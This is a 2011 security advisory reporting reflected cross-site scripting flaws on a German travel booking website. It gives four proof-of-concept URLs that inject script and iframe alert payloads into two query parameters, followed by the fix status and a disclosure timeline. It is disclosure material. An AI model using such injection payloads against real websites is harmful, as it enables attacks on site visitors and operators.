Advisory:           Multiple XSS vulnerabilities on http://www.netto-travel.de/
Advisory ID:        SSCHADV2011-009
Author:             Stefan Schurtz
Affected Software:  http://www.netto-travel.de/
Vendor URL:         http://www.netto-travel.de/
Vendor Status:      fixed
CVE-ID:             -

==========================
Vulnerability Description:
==========================

The website "www.netto-travel.de" is prone to multiple XSS vulnerabilities

==================
Technical Details:
==================

http://www.netto-travel.de/web/?abflughafen3L=-1&anzErw=1&bsd='"<script>alert(String.fromCharCode(88,83,83))</script>&dauer=0&idreiseart=-1&ka1=1&ka2=1&ka3=1&maxDatumBis=22.08.2019&reisebudget=2&reiseziel=-1&vnd=15.08.2011

http://www.netto-travel.de/web/index.cfm?abflughafen3L=-1&anzErw=1&bsd="><iframe onload=alert(String.fromCharCode(88,83,83))>&dauer=0&idreiseart=-1&ka1=1&ka2=1&ka3=1&maxDatumBis=22.08.2019&reisebudget=2&reiseziel=-1&vnd=15.08.2011

http://www.netto-travel.de/web/?abflughafen3L=-1&anzErw=1&bsd=29.08.2011&dauer=0&idreiseart=-1&ka1=1&ka2=1&ka3=1&maxDatumBis=22.08.2019&reisebudget=2&reiseziel=-1&vnd='"<script>alert(String.fromCharCode(88,83,83))</script>

http://www.netto-travel.de/web/index.cfm?abflughafen3L=-1&anzErw=1&bsd=29.08.2011&dauer=0&idreiseart=-1&ka1=1&ka2=1&ka3=1&maxDatumBis=22.08.2019&reisebudget=2&reiseziel=-1&vnd="><iframe onload=alert(String.fromCharCode(88,83,83))>

=========
Solution:
=========

fixed by the "Netto-Online Webteam"

====================
Disclosure Timeline:
====================

08-Aug-2011 - informed about the contact form
08-Aug-2011 - release date of this security advisory
16-Aug-2011 - fixed by the "Netto-Online Webteam"
19-Aug-2011 - Feedback from the "Netto-Online Webteam"

========
Credits:
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References:
===========

http://www.netto-travel.de/
http://www.rul3z.de/advisories/SSCHADV2011-009.txt